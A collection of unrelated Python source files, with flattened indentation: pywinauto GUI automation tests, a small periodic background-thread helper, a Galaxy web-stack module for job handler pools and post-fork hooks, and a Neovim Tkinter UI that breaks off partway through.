self.assertEquals(True, .49 > timedif < .6)
def test_wait(self):
"""test the functionality and timing of the wait method"""
allowable_error = .2
start = timestamp()
self.assertEqual(self.dlgspec.WrapperObject(), self.dlgspec.Wait("enaBleD "))
time_taken = (timestamp() - start)
if not 0 <= time_taken < (0 + 2 * allowable_error):
self.assertEqual(.02, time_taken)
start = timestamp()
self.assertEqual(self.dlgspec.WrapperObject(), self.dlgspec.Wait(" ready"))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.WrapperObject(), self.dlgspec.Wait(" exiSTS"))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.WrapperObject(), self.dlgspec.Wait(" VISIBLE "))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.WrapperObject(), self.dlgspec.Wait(" ready enabled"))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.WrapperObject(), self.dlgspec.Wait("visible exists "))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.WrapperObject(), self.dlgspec.Wait("exists "))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.WrapperObject(), self.dlgspec.Wait("actIve "))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
self.assertRaises(SyntaxError, self.dlgspec.Wait, "Invalid_criteria")
def test_wait_non_existing(self):
"""test timing of the wait method for non-existing element"""
allowable_error = .2
start = timestamp()
self.assertRaises(TimeoutError, self.app.BlahBlah.wait, 'exists')
expected = Timings.window_find_timeout
self.assertEqual(True, expected - allowable_error <= (timestamp() - start) < expected + allowable_error)
def test_wait_invisible(self):
"""test timing of the wait method for non-existing element and existing invisible one"""
# TODO: re-use an MFC sample for this test
allowable_error = .2
start = timestamp()
self.assertRaises(TimeoutError, self.app.BlahBlah.wait, 'visible')
expected = Timings.window_find_timeout
self.assertEqual(True, expected - allowable_error <= (timestamp() - start) < expected + allowable_error)
# make sure Status Bar is not visible
status_bar_menu = self.app.UntitledNotepad.menu().item('&View').sub_menu().item('&Status Bar')
if status_bar_menu.is_checked():
status_bar_menu.select()
# check that existing invisible control is still found with 'exists' criterion
status_bar_spec = self.app.UntitledNotepad.child_window(class_name="msctls_statusbar32", visible_only=False)
self.assertEqual('StatusBar', status_bar_spec.wait('exists').friendly_class_name())
start = timestamp()
self.assertRaises(TimeoutError, status_bar_spec.wait, 'exists visible')
self.assertEqual(True, expected - allowable_error <= (timestamp() - start) < expected + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, status_bar_spec.wait, 'visible exists')
self.assertEqual(True, expected - allowable_error <= (timestamp() - start) < expected + allowable_error)
def test_wait_not(self):
"""
Test that wait not fails for all the following
* raises and error when criteria not met
* timing is close to the timeout value
"""
allowable_error = .16
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.WaitNot, "enaBleD ", .1, .05)
taken = timestamp() - start
        if not .1 <= taken < .1 + allowable_error:
            # assertEqual to a value we know is wrong to get a more informative failure report
            self.assertEqual(.12, taken)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.WaitNot, " ready", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.WaitNot, " exiSTS", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.WaitNot, " VISIBLE ", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.WaitNot, " ready enabled", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.WaitNot, "visible exists ", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.WaitNot, "exists ", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.WaitNot, "actIve ", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
self.assertRaises(SyntaxError, self.dlgspec.WaitNot, "Invalid_criteria")
# def test_wait_ready(self):
# """Make sure the friendly class is set correctly"""
# allowable_error = .02
#
# start = timestamp()
# self.assertEqual(self.dlgspec.ctrl_(), self.dlgspec.WaitReady(.1, .05))
#
# if it didn't finish in the allocated time then raise an error
# # we assertEqual to something that we know is not right - to get a
# # better error report
# if not 0 <= (timestamp() - start) < 0 + allowable_error:
# self.assertEqual(0, timestamp() - start)
# #self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
#
#
# def testWaitNotReady(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertRaises(RuntimeError, self.dlgspec.WaitNotReady, .1, .05)
#
# if not .1 <= (timestamp() - start) < .1 + allowable_error:
# self.assertEqual(.1, timestamp() - start)
#
# #self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
#
#
# def testWaitEnabled(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertEqual(self.dlgspec.ctrl_(), self.dlgspec.WaitEnabled(.1, .05))
#
# if not 0 <= (timestamp() - start) < 0 + allowable_error:
# self.assertEqual(0, timestamp() - start)
#
# #self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
#
#
# def testWaitNotEnabled(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertRaises(RuntimeError, self.dlgspec.WaitNotEnabled, .1, .05)
# if not .1 <= (timestamp() - start) < .1 + allowable_error:
# self.assertEqual(.1, timestamp() - start)
# #self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
#
# def testWaitVisible(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertEqual(self.dlgspec.ctrl_(), self.dlgspec.WaitVisible(.1, .05))
# if not 0 <= (timestamp() - start) < 0 + allowable_error:
# self.assertEqual(0, timestamp() - start)
# #self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
#
# def testWaitNotVisible(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertRaises(RuntimeError, self.dlgspec.WaitNotVisible, .1, .05)
# if it didn't finish in the allocated time then raise an error
# # we assertEqual to something that we know is not right - to get a
# # better error report
# if not .1 <= (timestamp() - start) < .1 + allowable_error:
# self.assertEqual(.1, timestamp() - start)
#
# def testWaitExists(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertEqual(self.dlgspec.ctrl_(), self.dlgspec.WaitExists(.1, .05))
#
# if it didn't finish in the allocated time then raise an error
# # we assertEqual to something that we know is not right - to get a
# # better error report
# if not 0 <= (timestamp() - start) < 0 + allowable_error:
# self.assertEqual(.1, timestamp() - start)
#
# def testWaitNotExists(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertRaises(RuntimeError, self.dlgspec.WaitNotExists, .1, .05)
# if not .1 <= (timestamp() - start) < .1 + allowable_error:
# self.assertEqual(.1, timestamp() - start)
# #self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
def test_depth(self):
"""Test that descendants() with depth works correctly"""
self.dlgspec.menu_select("Format -> Font")
self.assertNotEqual(
len(self.app['Font'].descendants(depth=1)),
len(self.app['Font'].descendants(depth=2)))
def test_print_control_identifiers(self):
"""Make sure print_control_identifiers() doesn't crash"""
self.dlgspec.print_control_identifiers()
self.ctrlspec.print_control_identifiers()
def test_print_control_identifiers_file_output(self):
"""Make sure print_control_identifiers() creates correct file"""
output_filename = "test_print_control_identifiers.txt"
self.dlgspec.print_ctrl_ids(filename=output_filename)
if os.path.isfile(output_filename):
with open(output_filename, "r") as test_log_file:
content = str(test_log_file.readlines())
self.assertTrue("'Untitled - NotepadEdit'" in content
and "'Edit'" in content)
self.assertTrue("child_window(class_name=\"msctls_statusbar32\"" in content)
os.remove(output_filename)
else:
self.fail("print_control_identifiers can't create a file")
self.ctrlspec.dump_tree(filename=output_filename)
if os.path.isfile(output_filename):
with open(output_filename, "r") as test_log_file:
content = str(test_log_file.readlines())
self.assertTrue("child_window(class_name=\"Edit\")" in content)
os.remove(output_filename)
else:
self.fail("print_control_identifiers can't create a file")
def test_find_elements_re(self):
"""Test for bug #90: A crash in 'find_elements' when called with 'title_re' argument"""
self.dlgspec.Wait('visible')
windows = findwindows.find_elements(title_re = "Untitled - Notepad")
self.assertTrue(len(windows) >= 1)
class WaitUntilDecoratorTests(unittest.TestCase):
"""Unit tests for always_wait_until and always_wait_until_passes decorators"""
def test_always_wait_until_decorator_success(self):
"""Test always_wait_until_decorator success"""
@always_wait_until(4, 2)
def foo():
return True
self.assertTrue(foo())
def test_always_wait_until_decorator_failure(self):
"""Test wait_until_decorator failure"""
@always_wait_until(4, 2)
def foo():
return False
self.assertRaises(TimeoutError, foo)
def test_always_wait_until_passes_decorator_success(self):
"""Test always_wait_until_passes_decorator success"""
@always_wait_until_passes(4, 2)
def foo():
return True
self.assertTrue(foo())
def test_always_wait_until_passes_decorator_failure(self):
"""Test always_wait_until_passes_decorator failure"""
@always_wait_until_passes(4, 2)
def foo():
raise Exception("Unexpected Error in foo")
self.assertRaises(TimeoutError, foo)
class MultiLevelWindowSpecificationTests(unittest.TestCase):
"""Unit tests for multi-level (3+) WindowSpecification objects"""
if UIA_support:
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.slow()
self.app = Application(backend='uia').start(os.path.join(mfc_samples_folder, u"RowList.exe"))
self.dlg = self.app.RowListSampleApplication
def tearDown(self):
"""Close the application after tests"""
self.dlg.CloseButton.click()
self.dlg.wait_not('visible')
def test_3level_specification(self):
"""Test that controls can be accessed by 3 levels of attributes"""
self.dlg.Toolbar.About.click()
self.dlg.AboutRowList.OK.click()
#self.dlg.AboutRowList.wait_not('visible') # XXX: it takes more than 50 seconds!
else: # Win32
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
self.app = Application(backend='win32').start(os.path.join(mfc_samples_folder, u"CmnCtrl3.exe"))
self.dlg = self.app.CommonControlsSample
def tearDown(self):
"""Close the application after tests"""
self.dlg.SendMessage(win32defines.WM_CLOSE)
def test_4level_specification(self):
"""Test that controls can be accessed by 4 levels of attributes"""
self.assertEqual(self.dlg.CPagerCtrl.Pager.Toolbar.button_count(), 12)
class DesktopWindowSpecificationTests(unittest.TestCase):
"""Unit tests for Desktop object"""
if UIA_support:
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.slow()
self.app = Application().start('explorer.exe "' + mfc_samples_folder_32 + '"')
self.desktop = Desktop(backend='uia')
def tearDown(self):
"""Close the application after tests"""
self.desktop.MFC_samplesDialog.CloseButton.click()
self.desktop.MFC_samplesDialog.wait_not('visible')
def test_folder_list(self):
"""Test that ListViewWrapper returns correct files list in explorer.exe"""
files_list = self.desktop.MFC_samplesDialog.Shell_Folder_View.Items_View.wrapper_object()
self.assertEqual([item.window_text() for item in files_list.get_items()],
[u'x64', u'BCDialogMenu.exe', u'CmnCtrl1.exe', u'CmnCtrl2.exe', u'CmnCtrl3.exe',
u'CtrlTest.exe', u'mfc100u.dll', u'RebarTest.exe', u'RowList.exe', u'TrayMenu.exe'])
self.assertEqual(files_list.item('RebarTest.exe').window_text(), 'RebarTest.exe')
def test_set_backend_to_window_uia(self):
"""Set backend to method window(), except exception ValueError"""
with self.assertRaises(ValueError):
self.desktop.window(backend='uia', title='MFC_samplesDialog')
with self.assertRaises(ValueError):
self.desktop.window(backend='win32', title='MFC_samplesDialog')
def test_get_list_of_windows_uia(self):
"""Test that method .windows() returns a non-empty list of windows"""
dlgs = self.desktop.windows()
self.assertTrue(len(dlgs) > 1)
def test_set_backend_to_windows_uia(self):
"""Set backend to method windows, except exception ValueError"""
with self.assertRaises(ValueError):
self.desktop.windows(backend='win32')
with self.assertRaises(ValueError):
self.desktop.windows(backend='uia')
def test_only_visible_windows_uia(self):
"""Set visible_only to the method windows"""
dlgs = self.desktop.windows(visible_only=True)
self.assertTrue(all([win.is_visible() for win in dlgs]))
def test_only_enable_windows_uia(self):
"""Set enable_only to the method windows"""
dlgs = self.desktop.windows(enabled_only=True)
self.assertTrue(all([win.is_enabled() for win in dlgs]))
else: # Win32
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
self.app = Application(backend='win32').start(os.path.join(mfc_samples_folder, u"CmnCtrl3.exe"))
self.desktop = Desktop(backend='win32')
self.window_title = 'Common Controls Sample'
def tearDown(self):
"""Close the application after tests"""
self.desktop.window(title=self.window_title, process=self.app.process).SendMessage(win32defines.WM_CLOSE)
def test_simple_access_through_desktop(self):
"""Test that controls can be accessed by 4 levels of attributes"""
dlg = self.desktop.window(title=self.window_title, process=self.app.process)
self.assertEqual(dlg.Pager.Toolbar.button_count(), 12)
def test_set_backend_to_window_win32(self):
"""Set backend to method window(), except exception ValueError"""
with self.assertRaises(ValueError):
self.desktop.window(backend='uia', title=self.window_title, process=self.app.process)
with self.assertRaises(ValueError):
self.desktop.window(backend='win32', title=self.window_title, process=self.app.process)
def test_get_list_of_windows_win32(self):
"""Test that method .windows() returns a non-empty list of windows"""
dlgs = self.desktop.windows()
self.assertTrue(len(dlgs) > 1)
window_titles = [win_obj.window_text() for win_obj in dlgs]
self.assertTrue(self.window_title in window_titles)
def test_set_backend_to_windows_win32(self):
"""Set backend to method windows, except exception ValueError"""
with self.assertRaises(ValueError):
self.desktop.windows(backend='win32')
with self.assertRaises(ValueError):
self.desktop.windows(backend='uia')
def test_only_visible_windows_win32(self):
"""Set visible_only to the method windows"""
dlgs = self.desktop.windows(visible_only=True)
self.assertTrue(all([win.is_visible() for win in dlgs]))
def test_only_enable_windows_win32(self):
"""Set enable_only to the method windows"""
dlgs = self.desktop.windows(enabled_only=True)
self.assertTrue(all([win.is_enabled() for win in dlgs]))
if __name__ == "__main__":
unittest.main()
|
backgroundtask.py
|
import threading
import time
def your_function():
print("your code")
class Execute(object):
    # interval: number of seconds to sleep between calls to your_function()
def __init__(self, interval=10):
self.interval = interval
thread = threading.Thread(target=self.run, args=())
        # daemon=True: the background thread is killed automatically when the main program exits
thread.daemon = True
thread.start()
def run(self):
try:
while True:
# Do something
your_function()
time.sleep(self.interval)
except Exception:
pass
teste = Execute()
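# Note: because the worker is a daemon thread, the program exits (and the task
# stops) as soon as the main thread finishes. A minimal sketch of keeping the
# main thread alive (illustrative only):
#
#     if __name__ == '__main__':
#         Execute(interval=10)
#         while True:
#             time.sleep(1)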
|
__init__.py
|
"""Web application stack operations."""
import logging
import multiprocessing
import os
import sys
import threading
from typing import (
Callable,
FrozenSet,
List,
Optional,
Type,
)
from galaxy.util.facts import get_facts
from .handlers import HANDLER_ASSIGNMENT_METHODS
log = logging.getLogger(__name__)
class ApplicationStackLogFilter(logging.Filter):
def filter(self, record):
return True
class ApplicationStack:
name: Optional[str] = None
prohibited_middleware: FrozenSet[str] = frozenset()
log_filter_class: Type[logging.Filter] = ApplicationStackLogFilter
log_format = "%(name)s %(levelname)s %(asctime)s [pN:%(processName)s,p:%(process)d,tN:%(threadName)s] %(message)s"
# TODO: this belongs in the pool configuration
server_name_template = "{server_name}"
default_app_name = "main"
@classmethod
def log_filter(cls):
return cls.log_filter_class()
@classmethod
def get_app_kwds(cls, config_section, app_name=None, for_paste_app=False):
return {}
@classmethod
def register_postfork_function(cls, f, *args, **kwargs):
f(*args, **kwargs)
def __init__(self, app=None, config=None):
self.app = app
self.config = config or (app and app.config)
self.running = False
self._supports_returning = None
self._supports_skip_locked = None
self._preferred_handler_assignment_method = None
multiprocessing.current_process().name = getattr(self.config, "server_name", "main")
if app:
log.debug("%s initialized", self.__class__.__name__)
def supports_returning(self):
if self._supports_returning is None:
job_table = self.app.model.Job.__table__
stmt = job_table.update().where(job_table.c.id == -1).returning(job_table.c.id)
try:
self.app.model.session.execute(stmt)
self._supports_returning = True
except Exception:
self._supports_returning = False
return self._supports_returning
def supports_skip_locked(self):
if self._supports_skip_locked is None:
job_table = self.app.model.Job.__table__
stmt = job_table.select().where(job_table.c.id == -1).with_for_update(skip_locked=True)
try:
self.app.model.session.execute(stmt)
self._supports_skip_locked = True
except Exception:
self._supports_skip_locked = False
return self._supports_skip_locked
def get_preferred_handler_assignment_method(self):
if self._preferred_handler_assignment_method is None:
if self.app.application_stack.supports_skip_locked():
self._preferred_handler_assignment_method = HANDLER_ASSIGNMENT_METHODS.DB_SKIP_LOCKED
else:
log.debug(
"Database does not support WITH FOR UPDATE statement, cannot use DB-SKIP-LOCKED handler assignment"
)
self._preferred_handler_assignment_method = HANDLER_ASSIGNMENT_METHODS.DB_TRANSACTION_ISOLATION
return self._preferred_handler_assignment_method
def _set_default_job_handler_assignment_methods(self, job_config, base_pool):
"""Override in subclasses to set default job handler assignment methods if not explicitly configured by the administrator.
Called once per job_config.
"""
def _init_job_handler_assignment_methods(self, job_config, base_pool):
if not job_config.handler_assignment_methods_configured:
self._set_default_job_handler_assignment_methods(job_config, base_pool)
def _init_job_handler_subpools(self, job_config, base_pool):
"""Set up members of "subpools" ("base_pool.*") as handlers (including the base pool itself, if it exists)."""
for pool_name in self.configured_pools:
if pool_name == base_pool:
tag = job_config.DEFAULT_HANDLER_TAG
elif pool_name.startswith(f"{base_pool}."):
tag = pool_name.replace(f"{base_pool}.", "", 1)
else:
continue
# Pools are hierarchical (so that you can have e.g. workflow schedulers use the job handlers pool if no
# workflow schedulers pool exists), so if a pool for a given tag has already been found higher in the
# hierarchy, don't add members from a pool lower in the hierarchy.
if tag not in job_config.pool_for_tag:
if self.in_pool(pool_name):
job_config.is_handler = True
for handler in self.pool_members(pool_name):
job_config.add_handler(handler, [tag])
job_config.pool_for_tag[tag] = pool_name
def init_job_handling(self, job_config):
"""Automatically add pools as handlers if they are named per predefined names and there is not an explicit
job handler assignment configuration.
Also automatically set the preferred assignment method if pool handlers are found and an assignment method is
not explicitly configured by the administrator.
"""
stack_assignment_methods_configured = False
for base_pool in job_config.DEFAULT_BASE_HANDLER_POOLS:
if self.has_base_pool(base_pool):
if not stack_assignment_methods_configured:
self._init_job_handler_assignment_methods(job_config, base_pool)
stack_assignment_methods_configured = True
self._init_job_handler_subpools(job_config, base_pool)
def init_late_prefork(self):
pass
def log_startup(self):
log.info(f"Galaxy server instance '{self.config.server_name}' is running")
def start(self):
# TODO: with a stack config the pools could be parsed here
pass
def allowed_middleware(self, middleware):
if hasattr(middleware, "__name__"):
middleware = middleware.__name__
return middleware not in self.prohibited_middleware
def workers(self):
return []
@property
def pool_name(self):
# TODO: ideally jobs would be mappable to handlers by pool name
return None
@property
def configured_pools(self):
return {}
def has_base_pool(self, pool_name):
return self.has_pool(pool_name) or any(pool.startswith(f"{pool_name}.") for pool in self.configured_pools)
def has_pool(self, pool_name):
return pool_name in self.configured_pools
def in_pool(self, pool_name):
return False
def pool_members(self, pool_name):
return None
@property
def facts(self):
facts = get_facts(config=self.config)
facts.update({"pool_name": self.pool_name})
return facts
def set_postfork_server_name(self, app):
new_server_name = self.server_name_template.format(**self.facts)
if "GUNICORN_WORKER_ID" in os.environ:
new_server_name = f"{new_server_name}.{os.environ['GUNICORN_WORKER_ID']}"
multiprocessing.current_process().name = app.config.server_name = new_server_name
log.debug("server_name set to: %s", new_server_name)
def shutdown(self):
pass
class WebApplicationStack(ApplicationStack):
name = "Web"
class GunicornApplicationStack(ApplicationStack):
name = "Gunicorn"
do_post_fork = "--preload" in os.environ.get("GUNICORN_CMD_ARGS", "") or "--preload" in sys.argv
postfork_functions: List[Callable] = []
# Will be set to True by external hook
late_postfork_event = threading.Event()
@classmethod
def register_postfork_function(cls, f, *args, **kwargs):
# do_post_fork determines if we need to run postfork functions
if cls.do_post_fork:
# if so, we call ApplicationStack.late_postfork once after forking ...
if not cls.postfork_functions:
os.register_at_fork(after_in_child=cls.late_postfork)
# ... and store everything we need to run in ApplicationStack.postfork_functions
cls.postfork_functions.append(lambda: f(*args, **kwargs))
else:
f(*args, **kwargs)
@classmethod
def run_postfork(cls):
cls.late_postfork_event.wait(1)
for f in cls.postfork_functions:
f()
@classmethod
def late_postfork(cls):
# We can't run postfork functions immediately, because this is before the gunicorn `post_fork` hook runs,
# and we depend on the `post_fork` hook to set a worker id.
t = threading.Thread(target=cls.run_postfork)
t.start()
def log_startup(self):
msg = [f"Galaxy server instance '{self.config.server_name}' is running"]
if "GUNICORN_LISTENERS" in os.environ:
msg.append(f'serving on {os.environ["GUNICORN_LISTENERS"]}')
log.info("\n".join(msg))
class WeblessApplicationStack(ApplicationStack):
name = "Webless"
def _set_default_job_handler_assignment_methods(self, job_config, base_pool):
# We will only get here if --attach-to-pool has been set so it is safe to assume that this handler is dynamic
# and that we want to use one of the DB serialization methods.
#
# Disable DB_SELF if a valid pool is configured. Use DB "SKIP LOCKED" if the DB engine supports it, transaction
# isolation if it doesn't, or DB_PREASSIGN if the job_config doesn't allow either.
conf_class_name = job_config.__class__.__name__
remove_methods = [HANDLER_ASSIGNMENT_METHODS.DB_SELF]
add_method = self.get_preferred_handler_assignment_method()
log.debug(
"%s: No job handler assignment methods were configured but this server is configured to attach to the"
" '%s' pool, automatically enabling the '%s' assignment method",
conf_class_name,
base_pool,
add_method,
)
for m in remove_methods:
try:
job_config.handler_assignment_methods.remove(m)
log.debug(
"%s: Removed '%s' from handler assignment methods due to use of --attach-to-pool",
conf_class_name,
m,
)
except ValueError:
pass
if add_method not in job_config.handler_assignment_methods:
job_config.handler_assignment_methods.insert(0, add_method)
log.debug(
"%s: handler assignment methods updated to: %s",
conf_class_name,
", ".join(job_config.handler_assignment_methods),
)
def __init__(self, app=None, config=None):
super().__init__(app=app, config=config)
if self.app and self.config and self.config.attach_to_pools:
log.debug("Will attach to pool(s): %s", ", ".join(self.config.attach_to_pools))
@property
def configured_pools(self):
return {p: self.config.server_name for p in self.config.attach_to_pools}
def in_pool(self, pool_name):
return pool_name in self.config.attach_to_pools
def pool_members(self, pool_name):
return (self.config.server_name,) if self.in_pool(pool_name) else None
def application_stack_class() -> Type[ApplicationStack]:
"""Returns the correct ApplicationStack class for the stack under which
this Galaxy process is running.
"""
if "gunicorn" in os.environ.get("SERVER_SOFTWARE", ""):
return GunicornApplicationStack
elif os.environ.get("IS_WEBAPP") == "1":
return WebApplicationStack
return WeblessApplicationStack
def application_stack_instance(app=None, config=None) -> ApplicationStack:
stack_class = application_stack_class()
return stack_class(app=app, config=config)
def application_stack_log_filter():
return application_stack_class().log_filter_class()
def application_stack_log_formatter():
return logging.Formatter(fmt=application_stack_class().log_format)
def register_postfork_function(f, *args, **kwargs):
application_stack_class().register_postfork_function(f, *args, **kwargs)
def get_app_kwds(config_section, app_name=None):
return application_stack_class().get_app_kwds(config_section, app_name=app_name)
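# A minimal usage sketch (illustrative only; the import path is assumed to be
# this package, e.g. galaxy.web_stack): code that must run in every worker
# after forking - such as re-opening connections - can be registered at import
# time and the active stack decides when to call it:
#
#     from galaxy.web_stack import register_postfork_function
#
#     def reopen_connections():
#         ...
#
#     register_postfork_function(reopen_connections)
#
# The base ApplicationStack calls the function immediately; under gunicorn with
# --preload, GunicornApplicationStack defers it until after the fork via
# os.register_at_fork (see register_postfork_function above).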
|
tarruda.py
|
"""Neovim TKinter UI."""
import sys
from Tkinter import Canvas, Tk
from collections import deque
from threading import Thread
# import StringIO, cProfile, pstats
from neovim import attach
from tkFont import Font
SPECIAL_KEYS = {
'Escape': 'Esc',
'Return': 'CR',
'BackSpace': 'BS',
'Prior': 'PageUp',
'Next': 'PageDown',
'Delete': 'Del',
}
if sys.version_info < (3, 0):
range = xrange
class NvimTk(object):
"""Wraps all nvim/tk event handling."""
def __init__(self, nvim):
"""Initialize with a Nvim instance."""
self._nvim = nvim
self._attrs = {}
self._nvim_updates = deque()
self._canvas = None
self._fg = '#000000'
self._bg = '#ffffff'
def run(self):
"""Start the UI."""
self._tk_setup()
t = Thread(target=self._nvim_event_loop)
t.daemon = True
t.start()
self._root.mainloop()
def _tk_setup(self):
self._root = Tk()
self._root.bind('<<nvim_redraw>>', self._tk_nvim_redraw)
self._root.bind('<<nvim_detach>>', self._tk_nvim_detach)
self._root.bind('<Key>', self._tk_key)
    def _tk_nvim_redraw(self, *args):
        updates = self._nvim_updates.popleft()
        for update in updates:
            handler = getattr(self, '_tk_nvim_' + update[0])
            for update_args in update[1:]:
                handler(*update_args)
def _tk_nvim_detach(self, *args):
self._root.destroy()
def _tk_nvim_resize(self, width, height):
self._tk_redraw_canvas(width, height)
def _tk_nvim_clear(self):
self._tk_clear_region(0, self._height - 1, 0, self._width - 1)
def _tk_nvim_eol_clear(self):
row, col = (self._cursor_row, self._cursor_col,)
self._tk_clear_region(row, row, col, self._scroll_right)
def _tk_nvim_cursor_goto(self, row, col):
self._cursor_row = row
self._cursor_col = col
def _tk_nvim_cursor_on(self):
pass
def _tk_nvim_cursor_off(self):
pass
def _tk_nvim_mouse_on(self):
pass
def _tk_nvim_mouse_off(self):
pass
def _tk_nvim_insert_mode(self):
pass
def _tk_nvim_normal_mode(self):
pass
def _tk_nvim_set_scroll_region(self, top, bot, left, right):
self._scroll_top = top
self._scroll_bot = bot
self._scroll_left = left
self._scroll_right = right
def _tk_nvim_scroll(self, count):
top, bot = (self._scroll_top, self._scroll_bot,)
left, right = (self._scroll_left, self._scroll_right,)
if count > 0:
destroy_top = top
destroy_bot = top + count - 1
move_top = destroy_bot + 1
move_bot = bot
fill_top = move_bot + 1
fill_bot = fill_top + count - 1
else:
destroy_top = bot + count + 1
destroy_bot = bot
move_top = top
move_bot = destroy_top - 1
fill_bot = move_top - 1
fill_top = fill_bot + count + 1
# destroy items that would be moved outside the scroll region after
# scrolling
# self._tk_clear_region(destroy_top, destroy_bot, left, right)
# self._tk_clear_region(move_top, move_bot, left, right)
self._tk_destroy_region(destroy_top, destroy_bot, left, right)
self._tk_tag_region('move', move_top, move_bot, left, right)
self._canvas.move('move', 0, -count * self._rowsize)
self._canvas.dtag('move', 'move')
# self._tk_fill_region(fill_top, fill_bot, left, right)
def _tk_nvim_highlight_set(self, attrs):
self._attrs = attrs
def _tk_nvim_put(self, data):
# choose a Font instance
font = self._fnormal
if self._attrs.get('bold', False):
font = self._fbold
if self._attrs.get('italic', False):
font = self._fbolditalic if font == self._fbold else self._fitalic
# colors
fg = "#{0:0{1}x}".format(self._attrs.get('foreground', self._fg), 6)
bg = "#{0:0{1}x}".format(self._attrs.get('background', self._bg), 6)
# get the "text" and "rect" which correspond to the current cell
x, y = self._tk_get_coords(self._cursor_row, self._cursor_col)
items = self._canvas.find_overlapping(x, y, x + 1, y + 1)
if len(items) != 2:
# caught part the double-width character in the cell to the left,
# filter items which dont have the same horizontal coordinate as
# "x"
predicate = lambda item: self._canvas.coords(item)[0] == x
items = filter(predicate, items)
# rect has lower id than text, sort to unpack correctly
rect, text = sorted(items)
self._canvas.itemconfig(text, fill=fg, font=font, text=data or ' ')
self._canvas.itemconfig(rect, fill=bg)
self._tk_nvim_cursor_goto(self._cursor_row, self._cursor_col + 1)
def _tk_nvim_bell(self):
self._root.bell()
def _tk_nvim_update_fg(self, fg):
self._fg = "#{0:0{1}x}".format(fg, 6)
def _tk_nvim_update_bg(self, bg):
self._bg = "#{0:0{1}x}".format(bg, 6)
def _tk_redraw_canvas(self, width, height):
if self._canvas:
self._canvas.destroy()
self._fnormal = Font(family='Monospace', size=13)
self._fbold = Font(family='Monospace', weight='bold', size=13)
self._fitalic = Font(family='Monospace', slant='italic', size=13)
self._fbolditalic = Font(family='Monospace', weight='bold',
slant='italic', size=13)
self._colsize = self._fnormal.measure('A')
self._rowsize = self._fnormal.metrics('linespace')
self._canvas = Canvas(self._root, width=self._colsize * width,
height=self._rowsize * height)
self._tk_fill_region(0, height - 1, 0, width - 1)
self._cursor_row = 0
self._cursor_col = 0
self._scroll_top = 0
self._scroll_bot = height - 1
self._scroll_left = 0
self._scroll_right = width - 1
self._width, self._height = (width, height,)
self._canvas.pack()
def _tk_fill_region(self, top, bot, left, right):
# create columns from right to left so the left columns have a
# higher z-index than the right columns. This is required to
# properly display characters that cross cell boundary
for rownum in range(bot, top - 1, -1):
for colnum in range(right, left - 1, -1):
x1 = colnum * self._colsize
y1 = rownum * self._rowsize
x2 = (colnum + 1) * self._colsize
y2 = (rownum + 1) * self._rowsize
# for each cell, create two items: The rectangle is used for
# filling background and the text is for cell contents.
                self._canvas.create_rectangle(x1, y1, x2, y2,
                                              fill=self._bg, width=0)
                self._canvas.create_text(x1, y1, anchor='nw',
                                         font=self._fnormal, width=1,
                                         fill=self._fg, text=' ')
def _tk_clear_region(self, top, bot, left, right):
self._tk_tag_region('clear', top, bot, left, right)
self._canvas.itemconfig('clear', fill=self._bg)
self._canvas.dtag('clear', 'clear')
def _tk_destroy_region(self, top, bot, left, right):
self._tk_tag_region('destroy', top, bot, left, right)
self._canvas.delete('destroy')
self._canvas.dtag('destroy', 'destroy')
def _tk_tag_region(self, tag, top, bot, left, right):
x1, y1 = self._tk_get_coords(top, left)
x2, y2 = self._tk_get_coords(bot, right)
self._canvas.addtag_overlapping(tag, x1, y1, x2 + 1, y2 + 1)
